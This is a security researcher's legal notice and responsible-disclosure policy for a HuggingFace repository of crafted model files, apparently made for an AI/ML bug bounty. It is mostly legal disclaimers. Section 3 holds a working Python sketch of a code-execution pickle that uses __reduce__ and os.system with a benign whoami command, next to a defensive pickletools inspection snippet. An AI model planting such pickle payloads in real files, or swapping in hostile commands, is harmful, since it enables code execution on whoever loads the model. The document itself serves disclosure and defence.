
Security Research Repository — Legal Notice & Responsible Disclosure Policy

Repository Owner: Pavan Chow (@pavanchow)
Last Updated: February 25, 2026
Contact: Submit concerns via the HuggingFace community tab


⚠️ Important Notice — Read Before Downloading Any File

This repository contains proof-of-concept (PoC) security research files created exclusively for the purpose of responsible vulnerability disclosure through the Huntr.dev bug bounty platform — the world's first AI/ML security bug bounty program, operated by ProtectAI.

These files are made publicly accessible solely because Huntr.dev's submission process explicitly requires a public HuggingFace repository so that ProtectAI's automated validation bot (protectai-bot) can independently verify reported vulnerabilities. This is a mandatory step in the responsible disclosure workflow, not a choice made by the researcher.


1. Purpose & Authorization

All security research in this repository was conducted under the following authorized frameworks:

  • Huntr.dev MFV (Model File Vulnerability) Program — ProtectAI's official bug bounty program for AI/ML model file vulnerabilities
  • Responsible Disclosure / Coordinated Vulnerability Disclosure (CVD) principles as defined by the U.S. Department of Justice Framework for Vulnerability Disclosure Programs (May 2022)
  • Good Faith Security Research as defined by HackerOne's Gold Standard Safe Harbor (GSSH), aligned with DOJ guidelines, ENISA recommendations, OECD policy papers, and the disclose.io framework

This research is conducted in good faith with the sole intention of improving the security of AI/ML infrastructure for the benefit of the broader community.


2. Legal Framework & Safe Harbor

United States — Computer Fraud and Abuse Act (CFAA)

This research is conducted consistent with the U.S. Department of Justice's May 2022 charging policy, under which good-faith security research should not be prosecuted under the CFAA. Specifically:

  • No systems were accessed without authorization
  • All research was performed on locally installed open-source packages (pip-installable libraries) in isolated local environments
  • No production systems, user data, or live infrastructure was accessed or targeted at any time
  • All findings were reported to affected vendors through official channels (Huntr.dev, GitHub Security Advisories, Microsoft MSRC) before any public disclosure

United States — Digital Millennium Copyright Act (DMCA)

Proof-of-concept files do not circumvent any technological protection measures. They demonstrate vulnerabilities in publicly available open-source software for the purpose of improving security.

European Union — NIS2 Directive & ENISA CVD Guidelines

This research follows the ENISA Coordinated Vulnerability Disclosure framework and is consistent with the EU Agency for Cybersecurity's recommendations for responsible vulnerability disclosure (April 2022).

United Kingdom — Computer Misuse Act (CMA)

All research was performed on locally installed software in isolated environments. No unauthorized access to any computer system occurred at any time.

Australia — Criminal Code Act 1995 (Part 10.7)

Research was conducted without unauthorized access to any computer or network. All findings are disclosed responsibly through established bug bounty channels.

India — Information Technology Act 2000 (Sections 43 and 66)

All research was performed on locally installed open-source software. No unauthorized access, data interception, or system damage occurred.


3. What These Files Are

  • .pkl, .joblib, .gguf, .onnx — Crafted model files that demonstrate specific scanner bypass techniques for responsible disclosure
  • poc_*.py — Python scripts that generate and/or test the malicious model files
  • *.md — Documentation and research notes
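
Since some of these crafted files demonstrate code execution when loaded, researchers who want to examine them should disassemble the opcode stream rather than load them. A minimal sketch using Python's standard pickletools module is shown below; the file name suspect.pkl is a placeholder, not a file from this repository.

```python
# Minimal sketch: statically inspect a pickle file without executing it.
# pickletools.dis() only parses and prints the opcode stream; it never
# runs the payload, so it is safe to use on untrusted files.
import pickletools

with open("suspect.pkl", "rb") as f:  # placeholder name for any untrusted pickle
    pickletools.dis(f.read())

# A GLOBAL or STACK_GLOBAL opcode resolving to a callable such as os.system,
# followed by REDUCE, is the classic signature of a code-execution payload.
```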

All payloads are deliberately non-destructive. Where code execution is demonstrated, the payload is limited to benign commands such as:

  • whoami > /tmp/proof.txt — writes the current username to a temp file
  • Triggering a controlled crash or timeout
  • Making a network request to a researcher-controlled endpoint

No destructive commands (rm -rf, data exfiltration, persistence mechanisms, reverse shells, or credential theft) are used in any payload.
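
As context for the payload described above, the sketch below shows the general shape of such a benign pickle payload using the well-known __reduce__ hook. It is illustrative only, not one of this repository's actual PoC files; the class name and output file name are hypothetical.

```python
# Illustrative sketch of a benign proof-of-concept pickle, assuming the
# whoami payload described above. On unpickling it runs a single harmless
# command and nothing else.
import os
import pickle

class BenignProof:
    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct this object; here it
        # instructs the unpickler to call os.system with a benign command.
        return (os.system, ("whoami > /tmp/proof.txt",))

with open("poc_benign.pkl", "wb") as f:  # hypothetical output name
    pickle.dump(BenignProof(), f)
```

Loading such a file with pickle.load() in an isolated test environment creates /tmp/proof.txt, the kind of harmless, verifiable side effect listed above.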


4. Limitation of Liability & Disclaimer

BY DOWNLOADING, ACCESSING, OR USING ANY FILE IN THIS REPOSITORY, YOU ACKNOWLEDGE AND AGREE TO THE FOLLOWING:

  1. These files are provided for educational and security research purposes only. The repository owner makes no warranties, express or implied, regarding the safety, fitness for a particular purpose, or completeness of these files.

  2. The repository owner is NOT responsible for any damage, data loss, system compromise, legal consequences, or any other harm resulting from the download, use, misuse, or modification of these files by any third party.

  3. Use of these files against any system, network, or service that you do not own or have explicit written authorization to test is illegal under the CFAA (US), Computer Misuse Act (UK), and equivalent laws in most jurisdictions worldwide. The repository owner expressly disclaims all liability for unauthorized use.

  4. These files are not intended for use in production environments. They are intended exclusively for security researchers testing in isolated, controlled environments.

  5. The repository owner conducted all research on locally installed open-source software in isolated virtual environments on personal hardware. No third-party systems were accessed.

  6. Misuse of these files may constitute criminal offenses including but not limited to violations of the CFAA, DMCA, UK Computer Misuse Act, EU NIS2 Directive, and equivalent national laws. The repository owner bears no responsibility for any criminal or civil consequences arising from third-party misuse.


5. Responsible Disclosure Timeline

All vulnerabilities demonstrated in this repository have been or are in the process of being disclosed responsibly:

  • Huntr.dev MFV Program — Submitted through the official ProtectAI bug bounty portal. ProtectAI has been granted access to this repository for validation.
  • Vendor notification — Affected vendors are notified through official security disclosure channels (GitHub Security Advisories, vendor security email, Microsoft MSRC) in parallel with or prior to Huntr submission.
  • Public disclosure — Files in this repository are made public only after following Huntr.dev's required disclosure process. Early public disclosure would violate responsible disclosure principles.

6. Contact & Takedown Requests

If you are a vendor or security team with concerns about any file in this repository:

  1. Open a community discussion on this HuggingFace repository
  2. Contact via Huntr.dev if you are a program participant
  3. File a GitHub Security Advisory if the finding relates to your open-source project

The researcher will respond within 48 hours to legitimate security concerns and will cooperate fully with affected vendors.


7. References & Legal Framework Sources

The frameworks and guidance documents cited throughout this policy are:

  • U.S. Department of Justice, Framework for Vulnerability Disclosure Programs, and the May 2022 CFAA charging policy for good-faith security research
  • HackerOne Gold Standard Safe Harbor (GSSH)
  • ENISA Coordinated Vulnerability Disclosure recommendations (April 2022)
  • OECD policy papers on vulnerability disclosure
  • The disclose.io safe harbor framework
  • Huntr.dev MFV (Model File Vulnerability) Program, operated by ProtectAI

This policy was drafted in accordance with current best practices in responsible vulnerability disclosure as of February 2026. It is not legal advice. If you have specific legal concerns, consult a qualified attorney specializing in cybersecurity law.
